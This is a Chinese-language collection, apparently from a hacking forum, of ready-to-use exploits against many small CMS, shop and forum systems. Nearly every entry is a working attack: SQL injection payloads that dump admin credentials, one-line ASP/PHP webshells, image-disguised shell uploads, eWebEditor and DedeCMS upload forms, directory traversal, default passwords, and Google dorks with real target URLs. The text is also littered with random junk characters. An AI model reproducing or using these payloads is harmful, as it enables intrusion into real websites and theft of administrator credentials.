启航企业建站系统 cookie注入漏洞通杀所有版本5 ?) K6 B; [$ ]4 G9 q/ j
5 ^3 g% ~% |. H" C$ X
直接上exploit:
; L. h/ P4 u* s& X f* U$ L, Ojavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")); f1 N* T% X: Z' b6 j7 ^ V/ ]5 V
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
. F; W! z2 t$ Y( h# ?. o# z1 B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 n) e9 i" [- ~2 \+ V4 }( c8 _; Q: WAsprain论坛 注册用户 上传图片就可拿到webshell
t9 H$ ~/ _) q8 `: ^; f) X1 f4 E4 S" I7 F( o8 {. j+ }* P5 c
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
) z0 u" d* p6 V2 {, e1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
1 c* Z! t+ }6 p, c* @2.gif 为一小图片文件,一定要小,比如qq表情图片5 W8 _8 n- S+ U. D6 R$ \
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用3 e) q( n' l/ J+ a- T: Z( x4 R
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
0 D' j+ f8 ~, ]* @5.q.asp;.gif
3 Z9 T3 a% X3 L3 r! ~5 ngoogle:Powered by Asprain7 G! N) Y" U1 I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ g% y0 [# C* H& k8 n) l; e
|$ e4 Z, d- @0 y
ShopNum1全部系统存在上传漏洞。
0 `1 ]# G/ a9 \0 S* Y) m% _# Z9 w4 L- N. a
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。& u; r7 f1 t s5 ~5 H1 b, r
按说明 提示登录后台。。
5 n! w- c: _, E1 X. \在后台功能页面->附件管理->附件列表
( V$ \! S g# p5 I# M' t可以直接上传.aspx 后缀木马# E, j6 ]' h: b m, s0 S
http://demo.shopnum1.com/upload/20110720083822500.aspx
$ @! G( Z' I% ^' v! w4 S- N--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. J0 v1 F% g( h0 J" n- n5 f( }
0 W( A. v. b1 ?牛牛CMS中小企业网站管理系统 上传漏洞2 d, j' G% @2 @
+ M# Z7 U6 Q4 g: i2 t/ `$ ]
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。9 f% D( h( ?1 U X9 S0 e" l
后台:admin/login.asp
+ o6 K K- j. d" Zewebeditor 5.5 Nday
" f' x0 o4 B, Y: w" ~4 N: mexp:
' Z+ K% F# E+ s$ z0 ] U; ]% R<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
1 U: V7 l* t* M1 @6 A<input?type=file?name=uploadfile?size=100><br><br>?2 Y/ c4 z2 D) u1 { \# y
<input?type=submit?value=upload>?
- g& P7 I) W# o* }8 `) P k</form>! ~6 Q' P d( U$ s; B
ps:先上传小马.
5 _* n* q$ V3 r6 s! Sinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏+ x; h/ x6 w' Y
! V, z9 Q0 t4 x( C* k6 z) R0 R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Z6 I5 `) K: P7 D' v$ `2 |* W$ D9 ^. D! Z0 h( ]9 j
YothCMS 遍历目录漏洞
2 f, I3 M1 y7 B1 c7 A
- O9 r5 Q, V9 F* C4 K优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。) q1 g2 E; ]8 V8 | {. v
默认后台:admin/login.asp
4 o8 L$ A: f$ G8 ?遍历目录:
" B7 v; c! p, @* t% rewebeditor/manage/upload.asp?id=1&dir=../
5 ~, `8 T! G7 jdata:, I" W5 V) q- \- @" a" w2 c. \( P
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
& r. P( K7 Z' Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) q4 c D* C7 U6 \: v2 Q, @5 ]7 L' J+ j$ B7 A
Net112企业建站系统 1.03 V2 Q7 S8 G* Y, w
7 Q' L0 M8 T( |7 \' [( n0 _$ n源码简介:
% q% _# f9 ~% d- JNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。7 \1 N$ D6 H* i2 h
添加管理员:
. T' ^2 Q# Q: y3 O9 Y* nhttp://www.0855.tv/admin/admin.asp?action=add&level=2
* Q) D& q( Q$ O B5 a8 V. E9 c) t其实加不加都不是很重要,后台文件都没怎么作验证。( m/ b" s* ~* e% g
上传路径:
9 j& M" d! v* T, v1 b. Hhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200) ]' ~# {9 U' i4 c7 ?1 @
http://www.0855.tv/inc/Upfile.asp?Stype=2
7 T. i H7 E( w& u% n [怎么利用自己研究。
9 @- B/ a5 G3 R) K; J遍历目录:
- z% ]/ Z, T1 Q; whttp://www.0855.tv/admin/upfile.asp?path=../..& {0 B; S P" D: I2 c# T
如:. O7 Z; _ T% w/ x6 V4 f( L7 a+ [
http://www.0855.tv/admin/upfile.asp?path=../admin
% A. C/ ]$ Q4 R$ G8 P5 L1 Ahttp://www.0855.tv/admin/upfile.asp?path=../data
) a4 f$ f, I# v, u3 t--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! K2 m" |2 ~4 e$ o% @" Y6 o# G" a5 Q' S6 A! O# C8 ?8 K4 {5 V
易和阳光购物商城通杀 上传漏洞
, R. U1 N; M! A% k, t
3 t7 s. \! O3 Y5 c1 e; n" d前提要求是IIS6.0+asp坏境。
C+ O( H0 f* d1 o6 k漏洞文件Iheeo_upfile.asp ; M1 `/ Z v9 l; [9 A% c
过滤不严.直接可以iis6.0上传
5 N- a N5 n0 i* n把ASP木马改成0855.asp;1.gif
' {: j) p5 S5 M3 _, F直接放到明小子上传
( _. Q' n6 C6 v. I# D7 d; XGoogle搜索:inurl:product.asp?Iheeoid=+ n5 _/ e' q- ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# y$ y# d1 [4 U6 b! P! U2 }6 z
* c/ K+ e- G1 e# q3 J
phpmyadmin后台4种拿shell方法( N x4 |, q9 \; S1 Z7 B+ F4 F
9 k2 @1 {; b2 W& P4 K# J, K方法一:7 {1 a- f; y2 R( a4 h, n/ K. p
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );$ e. F) @' |" b: ~1 j- y
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
4 L: ^! I$ S: {" F8 c5 ?* `) C7 HSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
1 l& Q! b4 e& j3 \& @$ A: j8 I----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php$ F e9 _8 J& t) h# }, j" j3 U/ |4 s
一句话连接密码:xiaoma
2 Q1 a( a& a' `方法二:
) ~% }( p' P1 E+ ECreate TABLE xiaoma (xiaoma1 text NOT NULL);
7 p( q$ i& J, S: cInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');6 K4 J2 u: N$ ^ r& T
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
/ Y$ e+ e! `6 k/ hDrop TABLE IF EXISTS xiaoma;6 |; s' o' p- r( a8 m3 ?# J9 |
方法三:
/ u4 d4 Q1 v) @! Z, q# P读取文件内容: select load_file('E:/xamp/www/s.php');( Q& `& ]. W' E% Y8 Q
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'* w K2 B/ q& @( u
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
0 x5 E0 S* O2 W3 B, T0 C方法四:
+ L" `3 J0 q3 X7 Cselect load_file('E:/xamp/www/xiaoma.php');) a$ _' F6 B! W" s3 I
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'/ f9 m* M4 L- s) p$ S! Z) p, C
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
' h v& b& I" x) C--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ Q% F# M$ c$ z, X5 @% R0 Q
) P9 A- j( K, }& g7 c, [7 x传信网络独立开发网站源码0day漏洞
& A+ r' m7 O q' S9 D \6 K/ _; `) L8 \# l e& }4 Q7 n7 v
后台system/login.asp
" A3 V: [* T" f: e' J$ _2 P进了后台有个ewebeditor% c5 |8 L4 o9 @: e$ `
Google 搜索inurl:product1.asp?tyc=
2 X/ b" O- s" e+ _! c编辑器漏洞默认后台ubbcode/admin_login.asp$ }/ f. s3 h ~& t# s" f. q+ N
数据库ubbcode/db/ewebeditor.mdb
, Y8 d7 {1 I. C$ \4 Y" J9 `0 I# ~+ ~5 a默认账号密码yzm 111111) {! R3 X7 z& a+ C
" U4 i7 Z* f4 Z% w% _* [
拿webshell方法
$ }' k& A" T( a' P登陆后台点击“样式管理”-选择新增样式
8 t7 d" q7 D; _# J. _! }样式名称:scriptkiddies 随便写 7 D) [( {6 J _' C1 ~9 M
路径模式:选择绝对路径
$ Y% j# c; J- D1 f# e图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
+ K. b+ n x+ M3 u图片类型比如就是我们要上传的ASP木马格式
3 V$ s* }4 {& z4 G: M上传路径:/) G) T4 o; T( f8 N: S; w' U0 m' C
图片限制:写上1000 免的上不了我们的asp木马
2 t3 N; y9 h# P上传内容不要写( s2 g5 V- r5 `3 |
可以提交了
2 }9 W* v4 ?) g样式增加成功! . w0 ^2 h, U6 w; @
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
' U+ }, r; S2 R0 q按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
q; |$ K8 \" T( n9 |8 S网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies4 _7 t. f' G0 r7 ]/ F
上ASP木马 回车 等到路径. f* A$ o9 ]5 k
! S% P; n" Q( I/ G. N) I6 g
后台:system/login.asp
: ~3 M. ?- T6 W; d3 \Exp:3 a7 G0 L$ y$ V* g$ t
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master7 ^, s- ~9 p3 _0 P7 x
测试:! x* k: ?8 o1 F+ n
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master# B. F b2 G2 N2 D) `8 d, M
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
& R! L/ ~1 n& \# d4 d4 e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# G; G; }" c$ T9 ^" O# ?7 k6 \5 \
- ^! W2 v6 K& z" b. \4 ^foosun 0day 最新注入漏洞
9 o. ~( W% r7 _$ w9 ]- k- g7 b5 ^' f5 H+ c" @" f
漏洞文件:www.xxx.com/user/SetNextOptions.asp
+ \2 l- U1 G7 w0 T利用简单的方法: g' j; @' @& e. l
暴管理员帐号:
. O1 O2 G2 N ?1 ?http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
/ w! D! u, q3 c) V; O* W" Z& K暴管理员密码:
! [: N2 e) H0 Y+ @8 i% Nhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,1 p9 @4 X# W7 b- |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 c4 L/ e: w s2 r, T! |
& J9 H! H# Q# ~) x2 M网站程序的版权未知!3 a' I8 ^* |% T7 O5 c
1 x5 a. S7 g) c' f, o
默认网站数据库:% X/ {! r/ x! |% |9 v7 o
www.i0day.com/data/nxnews.mdb
1 t3 Z s0 p/ @2 Fewebeditor 在线编辑器:
& k; y# y1 r0 g9 P$ b$ o4 O编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb1 w! ^( M5 b/ ^- f
登录地址:ewebeditor/admin_login.asp
, r4 x& U" P. W+ o' t' s默认密码:admin admin d: Q5 j! M6 I" \) Q. G
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data; C% D: {* z/ @8 m, w
2 ^3 r( M1 K, W- h2 H5 `0 U
Sql注入漏洞:8 j) ~' F* f' O( n- U. I2 @
http://www.i0day.com/detail.asp?id=12
- x8 \( B4 ~" S0 S5 |: @. N' Iexp:% D. ]. H. a7 ?! L
union select 1,admin,password,4,5,6,7,8 from admin9 O& t' R7 U+ R$ I j
爆出明文帐号/密码
& l1 F; R* ~2 d# p7 k: T3 g8 v3 {9 o( V7 y
上传漏洞:+ Y# l% F1 w1 v0 u5 v+ U, |
后台+upfile.asp
8 Y" Y' ?* v1 I9 \如:
8 r% u# B' D: R% }2 H- ^) W" xhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。& A) D2 Z7 B9 t
shell的地址:网址+后台+成功上传的马
1 ^* b! {' l8 s5 d8 C* Agoogle:inurl:news.asp?lanmuName=
3 }* L5 R* e* z, q------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 c+ t! G; D8 y2 O+ W% t* `
4 i7 A( y2 x$ y: R" Adedecms最新0day利用不进后台直接拿WEBSHELL
6 e3 \* T( K: Z% Z& m" R2 a
$ c; h, k! M, q拿webshell的方法如下:2 H8 I" m [; w. @0 c$ l4 Y3 S/ M+ x, E
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
+ W/ b" |+ i# _7 x9 g" j3 _0 V# m前题条件,必须准备好自己的dede数据库,然后插入数据:+ i- _ j; Q% u% P( v' }& ?
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
0 X! q1 P8 T4 ?; S! S) `$ }& c+ X# T. G. A0 `, M5 I x) v0 ]
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。8 w e* _, |+ O& u1 h
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
# o& Q+ ]% r- t& y( z R<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
. z( @8 d. b3 D+ F2 o5 w2 R. x<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />8 H+ H5 \9 B- G
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />) m7 U4 ^) b) j0 I1 i
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
1 C* _& e: S& w8 X% @* K<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
]$ m# [6 J7 j! f- f; b" T4 T' r* N<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
0 |* p; m- i( k8 t$ |% d* p<input type="text" value="true" name="nocache" style="width:400">
+ |; O5 n5 l: [) R( F. H( P+ U<input type="submit" value="提交" name="QuickSearchBtn"><br />
+ v- g0 T8 {$ D# l/ K* [/ e! _$ i/ v</form>
2 w5 Z4 A! [! t( ]) `6 h- n<script>+ [5 g/ Q. G1 E* @# r8 V/ j) Q
function addaction()
6 a3 b* |. \) O* Y2 T, [{
' Z, k+ o, j( U6 \ gdocument.QuickSearch.action=document.QuickSearch.doaction.value;+ z) @$ N- j* ~& G8 H' t
}
4 }/ W% z- L* d8 ^. V- }$ E</script>
1 t ^. Z5 n9 U$ N3 y0 l2 ^-----------------------------------------------------------------------------------------------------------------------------------------------
- v" n$ w/ F8 O& A2 E& u
9 {/ @" H v% @; K8 i& H, Cdedecms织梦暴最新严重0day漏洞
% Q+ p8 ]' h1 K/ wbug被利用步骤如下:
+ x% T" E7 T" p; }2 hhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
( \/ A: e7 ?& K" o; I把上面{}上的字母改为当前的验证码,即可直接进入网站后台。* ~9 h$ V5 h! \# w- W
-------------------------------------------------------------------------------------------------------------------------------------------, \3 j+ v( w- ]( H+ ~# L3 I" A
. e/ x) U! ~$ c4 S; _) G多多淘宝客程序上传漏洞 9 q& s/ {* J/ ^- z
漏洞页面:9 g, v3 j( l) z( u2 I7 z3 `+ W
admin\upload_pic.php$ F$ }5 H* ], O& d. V# T6 R; O
传送门:
' |* S. U( o( g2 ^! j |4 \http://www.www.com/admin/upload_pic.php?uploadtext=slide15 s, i: t7 q+ ^" I3 e" [, E
PS:copy张图片马 直接 xxx.php 上传抓包地址!
6 s$ b" M, H5 r- W------------------------------------------------------------------------------------------------------------------------------------------------------: h4 d5 Q4 e+ I1 B
& w3 p E1 S6 _/ d2 L无忧公司系统ASP专业版后台上传漏洞
) g) d. ~. D: L& u0 B8 U- i漏洞文件 后台上传% l/ r7 M9 j2 N1 H- ?1 p
admin/uploadPic.asp
, s$ |" f1 ?9 f+ V5 [漏洞利用 这个漏洞好像是雷池的
5 k8 s& A7 t2 O, Chttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1 j6 l: R c4 K' ?9 J6 T
等到的webshell路径:( I( m, X% g1 F8 ?& x
/UploadFiles/scriptkiddies.asp;_2.gif
8 e0 q6 Q; F* {1 d---------------------------------------------------------------------------------------------------------------------------------------------------, p- B6 b- v9 k
! j$ n% K) U: V4 `+ }
住哪酒店分销联盟系统2010
, V' K" k( e) s; A. R' o' F* pSearch:) r* e, q/ H9 B @7 P4 M
inurl:index.php?m=hotelinfo
4 j/ R8 O4 n# m8 p- y0 xhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
4 h+ f4 k9 C3 h- r: C2 `# {) Q% r默认后台:index.php?m=admin/login
. `5 ~5 w/ X/ r b--------------------------------------------------------------------------------------------------------------------------------------------------
$ W' S- o& C+ |# t: p, l7 J5 ~" q( y S4 J- X
inurl:info_Print.asp?ArticleID=9 d) J' l" s f- |& o$ i2 a
后台 ad_login.asp- v8 b' k+ O- u% ^6 u* ^
爆管理员密码:5 U( I$ A/ p0 O# n: c! }6 Z+ ^
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin/ [( @% i+ ]5 \: Y% q& y
------------------------------------------------------------------------------------------------------------------------------------------------------------7 k' {9 P/ M8 u3 @0 D
6 i( {* Z% T: f, Z8 N) n8 W搜索框漏洞!: R$ ]8 Q3 y/ X% g$ B, h" `
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='" J# @& L. h ]2 H$ r9 i3 B
--------------------------------------------------------------------------------------------------------------------------------------------------------
- A4 T2 w8 S) }1 h& C$ q
~* r4 o9 X$ I# o. N' p3 n$ P关键字:- J9 }) D& x# E) ?
inurl:/reg_TemletSel.asp?step=2/ u/ F% O' d1 e* A! |: t( h' y
或者2 T3 L5 B' I% I& ?! E3 n
电子商务自助建站--您理想的助手$ L" h+ D: [$ y( I: r
-------------------------------------------------------------------------------------------------------------------------------------------------8 Y7 c3 H; C2 Q) Q( K6 I+ G
3 h8 M7 D. g* RiGiveTest 2.1.0注入漏洞
* s% X( y# X {; C/ ?- D+ rVersion: <= 2.1.0
6 R1 [ Q: f* ~! u0 z# Homepage: http://iGiveTest.com/8 Q6 A2 \% a- L0 K, G# ?
谷歌关键字: “Powered by iGiveTest”# C! j4 O/ c# Z4 T9 p
随便注册一个帐号。然后暴管理员帐号和密码& C* v1 I- D& |
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (17 d' E. ?) g, H& r9 ^. P
------------------------------------------------------------------------------------------------------------------------------------------------
4 T6 s% A6 h k9 F6 w" [1 a( X6 y; X5 g6 c0 x2 d
CKXP网上书店注入漏洞
9 D+ ]7 C4 P7 x工具加表:shop_admin 加字段:admin
H7 q% P2 \0 _后台:admin/login.asp 8 v* h; _* D; i* M9 g
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
) Q5 A0 B. q! s: q( binurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息2 \8 z7 z9 [+ r6 Z( e5 h
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 M6 ~( U3 O% W' X6 ?- ~
* k9 f- ?8 K3 p. ]0 m" q段富超个人网站系统留言本写马漏洞% w6 B ]+ ~& Y: f( _
源码下载:http://www.mycodes.net/24/2149.htm0 v& Q, m1 w0 _5 x1 V- W
addgbook.asp 提交一句话。
3 A" K) O5 s$ A. D' f连接: http://www.xxxx.tv/date/date3f.asp
: G _- B4 C) s$ u9 s$ Jgoogle:为防批量,特略!. m( N2 i# K" c, O- w
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ u! _1 P6 G) \# U' a
' K( {# e8 ^& I+ R" O
智有道专业旅游系统v1.0 注入及列目录漏洞5 g/ t! N1 Q0 W0 T
默认后台路径:/admin/login.asp
( t& f9 p. {8 {% s默认管理员:admin
' O4 X; W4 f/ y# M% b- L默认密码:123456
6 H2 b; ~$ i3 a6 f5 A* c5 @SQL EXP Tset:
' u1 l( }/ P4 Y0 q9 s/ Ihttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
3 p H: ]! a! ?3 }7 a% [------------------------------------------------------------------------------------------------------------------------------------------------------------------------! C, P* X( i1 P; r, _2 M: `
; F# ]( _' t; B3 N( t9 ?
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
2 e; X$ c( s3 Y b: HEXP:& F. |+ a0 X: U) W$ {$ m
<title>eWebeditoR3.8 for php任意文件上EXP</title>2 e' l- [( M, [; l7 b
<form action="" method=post enctype="multip
, c5 h1 ~# e, |: r- G, aart/form-data">
( f. Y1 J/ E( S! N( a- y<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 7 c+ m9 X- \& c$ {
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ! v, S/ a: q- ~: \4 g
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
/ i& r" i6 w1 F3 v. ]7 efile:<input type=file name="uploadfile"><br> X' l. W" Z9 m; `% p2 d, D% I
<input type=button value=submit onclick=fsubmit()>
6 y! ?( b- t6 B</form><br>
/ g1 Y& z4 B( s9 a/ I<script> + Z" K8 W2 U1 o; u8 z% N8 X1 W8 S
function fsubmit(){ % z! ^( E5 Q4 D3 {
form = document.forms[0];
- R! n% m0 x: Lform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
U! E; m$ H8 h" s( u0 g7 lalert(form.action);
! \: q j5 c2 eform.submit(); 3 a4 y9 f2 Q! v7 a E1 w/ g* Z
}
" G. J( a$ B+ J' [5 ?8 s</script>0 K7 u" j, B/ p
注意修改里面ewebeditor的名称还有路径。( y0 X0 }5 f# _- q# d$ `" z- r2 s# N- J
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ a# U' c' j; S+ r6 Y, l D- I7 N, d1 m
8 O& ^( m0 T* ?6 W9 U9 O% W, ^3 d5 ]提交’时提示ip被记录 防注入系统的利用
& g9 x& t- u* J, ?' v- g& N网址:http://www.xxx.com/newslist.asp?id=122′2 c9 ~' I* m1 B+ b
提示“你的操作已被记录!”等信息。, ^! L" k7 ~8 N* u/ G/ i/ a
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
% k$ _3 {+ o, L- ^0 u-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 J" ]. G3 W5 A
- O* c% r/ D& q7 }# _/ a
西部商务网站管理系统 批量拿shell-0day
4 O( o4 b" V d+ n; I+ x6 E这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 4 q! q; q( j+ c- O6 I) h! E
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛. i* Q) z/ ?8 u: j: f6 I
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
# g9 s7 ^ F7 B3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
0 K0 V5 m8 P9 x; \---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 B0 o8 {+ v! V% z \( B! O: m% ~: e$ f/ G
JspRun!6.0 论坛管理后台注入漏洞" C" g- p: a( @( s+ U L
9 Y$ U, q7 N# ?1 d' p( K/ K& KSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
9 R7 ]$ C4 }2 B% x- B8 [ ^/ N9 jJspRun!6.0
0 k9 k. k: o, B, `漏洞描述:
: u3 r& e; K( m8 N% g2 x5 }! zJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
! R/ V8 w1 w9 G2 v" D# M# Z9 u9 h在处理后台提交的文件中ForumManageAction.java第1940行1 A; c ^: e* X% e0 V$ [
String export = request.getParameter("export");//直接获取,没有安全过滤- b+ B+ `/ o3 x- s( D
if(export!=null){* l" r* N/ E) I. l; _8 O; `8 ~
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...6 u; o# T. Z& g! m
if(styles==null||styles.size()==0){
, k! l5 R; v3 i! c* f5 u<*参考
/ @/ {' f' B( c. g4 E& }* lnuanfan@gmail.com
% j, T2 W" n) V# Y: p3 \5 q*> SEBUG安全建议:9 A H. ^) \ B( N: a T" X0 p
www.jsprun.net
- X* U2 R) f. T2 y' F$ Q, U(1)安全过滤变量export% R; I( _9 J0 x' l
(2)在查询语句中使用占位符3 j: p/ N) M6 x
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------% X8 j+ _+ I& X7 i D ?0 r; E
( ?( I4 p c- }
乌邦图企业网站系统 cookies 注入
) K9 x9 P% C# Y( E$ L
: ]" `$ |4 I1 `& B2 K5 o程序完整登陆后台:/admin/login.asp
3 b# j7 z" l, a0 M5 Y. v默认登陆帐号:admin 密码:admin888% w" b4 j8 R- J* E$ z) ^3 Q3 w
语句:(前面加个空格)
& H7 ^8 a2 T7 Q1 l( _and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin2 c3 r! C) W- z8 P* ~! R. V/ G( |$ o
或者是16个字段:
4 w/ O; z/ h: w0 vand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
3 Y- J/ Q2 N$ n- U' q爆不出来自己猜字段。
: C- ]; Z- U- y4 n G注入点:http://www.untnt.com/shownews.asp?=88& r0 x2 X0 r- l% d* B
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp# ]3 J# m- i" L+ T: ?; ]
关键字:
6 O' L8 B2 q% O, \$ ?inurl:shownews?asp.id=
2 ]0 q& C& B) q-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! @! c* J3 q+ a0 X8 \: ?( r* @9 X; A: ^
CKXP网上书店注入漏洞
; ]. F4 `+ \7 z4 B+ T$ v# U# Y
6 {0 i8 Z, T$ ~/ {+ e$ _. n8 y工具加表:shop_admin 加字段:admin% L; o. a2 z* K m i- t9 e* t
后台:admin/login.asp 8 r9 s+ B3 K/ z
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/, x- y- @1 }( S* y
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
2 F" b* \& F, v+ _9 Y4 i+ Y---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( D$ J# \5 t/ T" K' U7 X
5 J3 Y N7 h8 nYxShop易想购物商城4.7.1版本任意文件上传漏洞
6 L0 o- Y; V# Z& h1 [- J
+ M* T) b7 `; ^$ u. z- bhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx' y+ F6 W$ k+ B) h |7 m% W+ ^
